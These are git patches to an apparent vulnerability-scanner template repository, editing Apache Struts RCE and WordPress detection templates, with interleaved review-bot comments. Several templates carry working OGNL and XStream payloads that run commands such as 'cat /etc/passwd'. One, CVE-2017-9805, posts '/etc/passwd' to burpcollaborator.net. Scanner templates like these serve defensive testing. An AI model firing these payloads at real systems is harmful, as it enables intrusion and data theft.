text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index a264ac651a..3e11c53b73 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml 
@@ -5,9 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - tags: cve, cve2017,apache,rce - -# ref: https://medium.com/@blackriddle/apache-struts2-rce-cve-2017-9805-4c6f58b622cb + tags: cve,cve2017,apache,rce requests: - method: POST @@ -17,10 +15,10 @@ requests: headers: Content-Type: application/xml body: | - - - 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 - + + + 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 + matchers-condition: and From e532df34504f7de7963ae9c1aa44531eb44bb6c6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 01:50:57 +0530 Subject: [PATCH 012/370] more changes --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 2 +- cves/2013/CVE-2013-1966.yaml | 2 +- cves/2013/CVE-2013-2134.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 9fdb8d6165..6a6da29d52 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.guildhab.top/?p=2326 - tags: cve, cve2007,apache,rce + tags: cve,cve2007,apache,rce requests: - method: POST diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index 15c550993f..bf8edf7149 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve, cve2012,apache,rce + tags: cve,cve2012,apache,rce requests: - method: POST diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index 95e8844d27..b2a30a9242 100644 --- a/cves/2013/CVE-2013-1966.yaml 
+++ b/cves/2013/CVE-2013-1966.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve, cve2013,apache,rce + tags: cve,cve2013,apache,rce requests: - method: GET diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index c58fa2a8de..b27abb6fbf 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve, cve2013,apache,rce + tags: cve,cve2013,apache,rce requests: - method: GET From b6091f90906eeb14a4c06eefcc0d67befa9fb8b2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:31:32 +0530 Subject: [PATCH 013/370] improved matcher and tags update --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0392.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 6 ++++-- cves/2013/CVE-2013-1966.yaml | 2 +- cves/2013/CVE-2013-2134.yaml | 2 +- cves/2013/CVE-2013-2251.yaml | 2 +- cves/2017/CVE-2017-12611.yaml | 2 +- cves/2017/CVE-2017-5638.yaml | 6 +++--- cves/2017/CVE-2017-9805.yaml | 2 +- cves/2020/CVE-2020-17530.yaml | 2 +- exposures/logs/struts-debug-mode.yaml | 2 +- 11 files changed, 16 insertions(+), 14 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 6a6da29d52..09223acbbb 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml 
@@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.guildhab.top/?p=2326 - tags: cve,cve2007,apache,rce + tags: cve,cve2007,apache,rce,struts requests: - method: POST diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index d89fe41d73..1b40dea9cb 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 - tags: cve, cve2012,apache,rce + tags: cve, cve2012,apache,rce,struts requests: - method: GET diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index bf8edf7149..aabf87fb1b 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve,cve2012,apache,rce + tags: cve,cve2012,apache,struts,rce requests: - method: POST @@ -21,7 +21,9 @@ requests: - type: regex regex: - - "uid=*" + - "uid(.*)" + - "gid(.*)" + part: body condition: and - type: status diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index b2a30a9242..6a4732774f 100644 --- a/cves/2013/CVE-2013-1966.yaml +++ b/cves/2013/CVE-2013-1966.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve,cve2013,apache,rce + tags: cve,cve2013,apache,rce,struts requests: - method: GET diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index b27abb6fbf..ad8111c610 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml 
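Review bot: `tags: cve, cve2012,apache,rce,struts` in cves/2012/CVE-2012-0392.yaml keeps the space after the first comma while the other files touched by this commit use the comma-only form (`tags: cve,cve2007,apache,rce,struts`); the earlier e532df34 normalised the siblings but skipped this file, and this edit carries the inconsistency forward. The order of the added tags also differs between files (`apache,struts,rce` in CVE-2012-0838 versus `apache,rce,struts` elsewhere), a cosmetic point worth settling while all eleven files are being touched. The `part: body` added to the CVE-2012-0838 regex matcher is the default for body matching, so a one-line comment or its removal would avoid suggesting the sibling matchers without `part:` behave differently.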
@@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control - tags: cve,cve2013,apache,rce + tags: cve,cve2013,apache,rce,struts requests: - method: GET diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 591593f19b..7bce805f94 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -5,7 +5,7 @@ info: author: exploitation & @dwisiswant0 severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. - tags: cve,cve2013,rce + tags: cve,cve2013,rce,struts,apache requests: - payloads: diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index 7ead98e310..2519feaf3f 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611 - tags: cve, cve2017,apache,rce + tags: cve,cve2017,apache,rce,struts requests: - method: POST diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 615cf36cac..6696adbe72 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml 
@@ -1,10 +1,10 @@ id: CVE-2017-5638 info: - author: "Random Robbie" - name: "Struts2 RCE " + author: Random Robbie + name: Struts2 RCE severity: critical description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. - tags: cve,cve2017,struts,rce + tags: cve,cve2017,struts,rce,apache # This template supports the detection part only. # Do not test any website without permission diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 3e11c53b73..63061429ce 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - tags: cve,cve2017,apache,rce + tags: cve,cve2017,apache,rce,struts requests: - method: POST diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index 38c7823e00..9de289e9fe 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - tags: cve,cve2020,apache,rce + tags: cve,cve2020,apache,rce,struts # Forced OGNL evaluation, when evaluated on raw user input in tag attributes, # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml index d72731b366..3371fb9fca 100644 --- a/exposures/logs/struts-debug-mode.yaml +++ b/exposures/logs/struts-debug-mode.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts setup in Debug-Mode author: pd-team severity: low - tags: logs,struts + tags: logs,struts,apache requests: - method: GET From d0580f52b6ecc07c7dba77ff5684e69a7ac681a6 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:28:11 +0000 Subject: [PATCH 014/370] Create CVE-2013-1965.yaml --- cves/2013/CVE-2013-1965.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-1965.yaml diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml new file mode 100644 index 0000000000..02706ba648 --- /dev/null +++ b/cves/2013/CVE-2013-1965.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-1965 + +info: + name: Apache Struts2 S2-012 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965 + tags: cve,cve2013,apache,rce,struts2 + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 16db75f87631298aa0b812f820bbc2f7d65658c2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 22 Feb 2021 12:42:50 +0000 Subject: [PATCH 015/370] Create CVE-2013-2135.yaml --- cves/2013/CVE-2013-2135.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2013/CVE-2013-2135.yaml 
diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml new file mode 100644 index 0000000000..8b26075b94 --- /dev/null +++ b/cves/2013/CVE-2013-2135.yaml @@ -0,0 +1,25 @@ +id: CVE-2013-2135 + +info: + name: Apache Struts2 S2-015 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 + tags: cve,cve2013,apache,rce,struts2 + +requests: + - method: GET + path: + - "{{BaseURL}}/param.action${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "uid=*" + condition: and + + - type: status + status: + - 404 From 837d43a4304ce7fd99dd9d6cfbd4515e5a8f8dc8 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 23:47:58 +0530 Subject: [PATCH 016/370] few changes --- cves/2013/CVE-2013-1965.yaml | 4 ++-- cves/2013/CVE-2013-2135.yaml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index 02706ba648..38a168df56 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml 
@@ -5,14 +5,14 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - tags: cve,cve2013,apache,rce,struts2 + tags: cve,cve2013,apache,rce,struts requests: - method: POST path: - "{{BaseURL}}/user.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D diff --git a/cves/2013/CVE-2013-2135.yaml b/cves/2013/CVE-2013-2135.yaml index 8b26075b94..49b8b8479d 100644 --- a/cves/2013/CVE-2013-2135.yaml +++ b/cves/2013/CVE-2013-2135.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2135 - tags: cve,cve2013,apache,rce,struts2 + tags: cve,cve2013,apache,rce,struts requests: - method: GET @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "uid=*" + - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" condition: and - type: status From dae21b45887157eb72372170070e45f1d03e8b17 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 01:42:08 +0000 Subject: [PATCH 017/370] =?UTF-8?q?Fix=20Payloads=20=F0=9F=9B=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2017/CVE-2017-9805.yaml | 60 +++++++++++++++++++++++++++++++++--- 1 file changed, 56 insertions(+), 4 deletions(-) 
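Review bot: The new regex in the CVE-2013-2135 hunk, `((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)`, rejects the most common service accounts because `[a-z0-9]+` admits neither `-` nor `_` — `uid=33(www-data)` does not match — and `[0-9]{1,4}` fails on ids of five or more digits, which directory-backed accounts routinely have. `- "((u|g)id|groups)=[0-9]+\\([a-z0-9_-]+\\)"` covers both cases. The other two hunks in this commit (tag spelling and the `Content-Type` indent) need no change.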
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 63061429ce..5a1193818f 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -11,14 +11,66 @@ requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - - "{{BaseURL}}/orders" + - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | - - 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 - + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + burpcollaborator.net + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + matchers-condition: and From 3be6ea99fda7c97bb0b9aaa508071166c7e93d26 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 01:51:14 +0000 Subject: [PATCH 018/370] update tags --- cves/2016/CVE-2016-3081.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index de0e0dd738..f0478d8b38 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: high reference: https://cwiki.apache.org/confluence/display/WW/S2-032 - tags: cve,cve2016,struts,rce + tags: cve,cve2016,struts,rce,apache requests: - raw: From 7eff3819e8774be7dfa4389e971950822a1f74eb Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 23 Feb 2021 02:37:32 +0000 Subject: [PATCH 019/370] =?UTF-8?q?update=20payloads=20CVE-2007-4556=20?= =?UTF-8?q?=F0=9F=9B=A0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2007/CVE-2007-4556.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
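Review bot: The rewritten body still sends the target's `/etc/passwd` to `burpcollaborator.net` (`wget --post-file /etc/passwd burpcollaborator.net`), a host the template user does not control, and the template cannot observe that request at all — its matchers (they begin outside the hunk) only inspect the HTTP response. That makes the check both unverifiable and an unnecessary disclosure of target data to a third party; the out-of-band destination should at minimum be a documented placeholder the operator has to set, and a check with no side effect on the host would be preferable for a template that ships in a default scan set. The XML element names appear to have been stripped when this page was rendered, so the structure of the new body cannot be reviewed here.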
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 09223acbbb..ba0fb52f99 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -14,14 +14,14 @@ requests: headers: Content-Type: application/x-www-form-urlencoded body: | - username=test&password=%25%7B123456789*987654321%7D + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D matchers-condition: and matchers: - - type: word - words: - - "-67153019" + - type: regex + regex: + - "root:[x*]:0:0" condition: and - type: status From df532f676285c0122e24aa9121cb009c7076f71f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 24 Feb 2021 04:29:30 +0000 Subject: [PATCH 020/370] Create CVE-2018-11776.yaml --- cves/2018/CVE-2018-11776.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2018/CVE-2018-11776.yaml diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml new file mode 100644 index 0000000000..522ae3000b --- /dev/null +++ b/cves/2018/CVE-2018-11776.yaml 
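Review bot: The replacement payload turns a side-effect-free detection into active exploitation: the removed `%{123456789*987654321}` probe only evaluated arithmetic and matched its distinctive result (`-67153019`), whereas the new body runs `cat /etc/passwd` on the target and writes the file into the response. The arithmetic probe already proved expression evaluation, so keeping it as the primary matcher gives the same evidence with no impact on the host. If the intrusive form is kept, `description` and the tags should say that the template executes a command so operators can exclude it from non-intrusive profiles.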
@@ -0,0 +1,25 @@ +id: CVE-2018-11776 + +info: + name: Apache Struts2 S2-057 RCE + author: pikpikcu + severity: critical + reference: https://github.com/jas502n/St2-057 + tags: cve,cve2018,apache,rce,struts2 + +requests: + - method: GET + path: + - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 8927253cb3f1e16f6164b4b92a2c6cfeadcd81a9 Mon Sep 17 00:00:00 2001 From: ganoes Date: Thu, 25 Feb 2021 11:13:01 +0100 Subject: [PATCH 021/370] Improvement of the regex in open redirection template --- vulnerabilities/generic/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 662007159c..a1c0961a85 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -46,5 +46,5 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$' part: header From 5c87671a004c769763b759aaa4c7e16536c52dbc Mon Sep 17 00:00:00 2001 
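Review bot: `tags: cve,cve2018,apache,rce,struts2` reintroduces the `struts2` spelling that patch 016 on this page just normalized to `struts` in the two 2013 templates, so this template will not be selected together with them by `-tags struts`; use `struts`. As with the other new Struts templates in this series, `description` is missing and `reference` points at a third-party proof-of-concept repository rather than the vendor advisory. `condition: and` on the single regex entry is a no-op.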
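Review bot: The widened prefix `[a-zA-Z0-9\-_\.@]*` is no longer separated from `example\.com` by a boundary, so a host that merely ends in that string — `https://myexample.com`, `//notexample.com` — now satisfies the matcher and becomes a false positive when a site of that shape redirects to itself. Requiring the prefix to end in a dot or `@` keeps the new `user@host` case and restores the boundary: `- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*[\.@])?example\.com(?:\s*?)$'`.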
From: Joan Bono Date: Thu, 25 Feb 2021 16:18:05 +0100 Subject: [PATCH 022/370] Create gunicorn-detect.yml
--- technologies/gunicorn-detect.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/gunicorn-detect.yml
diff --git a/technologies/gunicorn-detect.yml b/technologies/gunicorn-detect.yml new file mode 100644
index 0000000000..69f286e77b
--- /dev/null
+++ b/technologies/gunicorn-detect.yml
@@ -0,0 +1,25 @@
+id: gunicorn-detect
+info:
+ name: Detect Gunicorn Server
+ author: joanbono
+ description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ part: header
+ regex:
+ - gunicorn+
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - Server
From 14786f26dfe2a09551bad27113c880543ad3cb9d Mon Sep 17 00:00:00 2001 From: YashGoti <39102999+YashGoti@users.noreply.github.com> Date: Thu, 25 Feb 2021 21:05:25 +0530 Subject: [PATCH 023/370] Create wp-license
--- exposures/files/wp-license | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/files/wp-license
diff --git a/exposures/files/wp-license b/exposures/files/wp-license new file mode 100644
index 0000000000..132050d405
--- /dev/null
+++ b/exposures/files/wp-license
@@ -0,0 +1,30 @@
+id: wp-license
+
+info:
+ name: WordPress License File Discloser
+ author: yashgoti
+ severity: info
+ description: Wordpress default license file discloser to identify wordpress is running
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/license.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "WordPress"
+ - " - "
+ - "Web publishing software"
+ condition: and
+
+ - type: word
+ words:
+ - "text/plain"
+ part: header
+
+ - type: status
+ status:
+ - 200
From 3eb0e91444f8bff5ca586ed0135e014b1bba07df Mon Sep 17 00:00:00 2001
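Review bot: The header regex `gunicorn+` quantifies only the final `n`, so it is effectively the literal `gunicor` followed by one or more `n` and never captures anything useful; if the intent is just to recognise the banner, `- gunicorn` is enough, and if the version is wanted a capturing extractor such as `regex: - 'gunicorn/([0-9.]+)'` with `group: 1` is more useful than the whole `Server` value the `kval` extractor returns. A blank line between `id:` and `info:` would match the layout of the other templates on this page. The `.yml` extension is corrected by a later commit in this series.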
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 22:57:42 +0530 Subject: [PATCH 024/370] misc changes --- exposures/files/wp-license | 30 ------------------------------ miscellaneous/wp-license.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+), 30 deletions(-) delete mode 100644 exposures/files/wp-license create mode 100644 miscellaneous/wp-license.yaml diff --git a/exposures/files/wp-license b/exposures/files/wp-license deleted file mode 100644 index 132050d405..0000000000 --- a/exposures/files/wp-license +++ /dev/null @@ -1,30 +0,0 @@ -id: wp-license - -info: - name: WordPress License File Discloser - author: yashgoti - severity: info - description: Wordpress default license file discloser to identify wordpress is running - -requests: - - method: GET - path: - - "{{BaseURL}}/license.txt" - - matchers-condition: and - matchers: - - type: word - words: - - "WordPress" - - " - " - - "Web publishing software" - condition: and - - - type: word - words: - - "text/plain" - part: header - - - type: status - status: - - 200 diff --git a/miscellaneous/wp-license.yaml b/miscellaneous/wp-license.yaml new file mode 100644 index 0000000000..35ab078af8 --- /dev/null +++ b/miscellaneous/wp-license.yaml @@ -0,0 +1,21 @@ +id: wp-license + +info: + name: WordPress license file disclosure + author: yashgoti + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/license.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "WordPress - Web publishing software" + + - type: status + status: + - 200 From 1253bd71dc03dad00e687fc52358baf7da9fd3e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 17:28:25 +0000 Subject: [PATCH 025/370] Auto Update README [Thu Feb 25 17:28:25 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33d51dc616..0fbb83b7e5 100644 --- a/README.md +++ b/README.md 
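Review bot: `tags` is missing from the new `miscellaneous/wp-license.yaml`, so it cannot be selected by tag together with the other WordPress templates (the sibling `wordpress-user-enumeration.yaml` in patch 036 on this page carries `tags: wordpress`); add `tags: wordpress` under `info`. The single phrase `WordPress - Web publishing software` is tighter than the three-word AND it replaces, so dropping the `text/plain` header check looks acceptable, but it should be a deliberate choice rather than something lost in the move. The deletion of `exposures/files/wp-license` needs no review.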
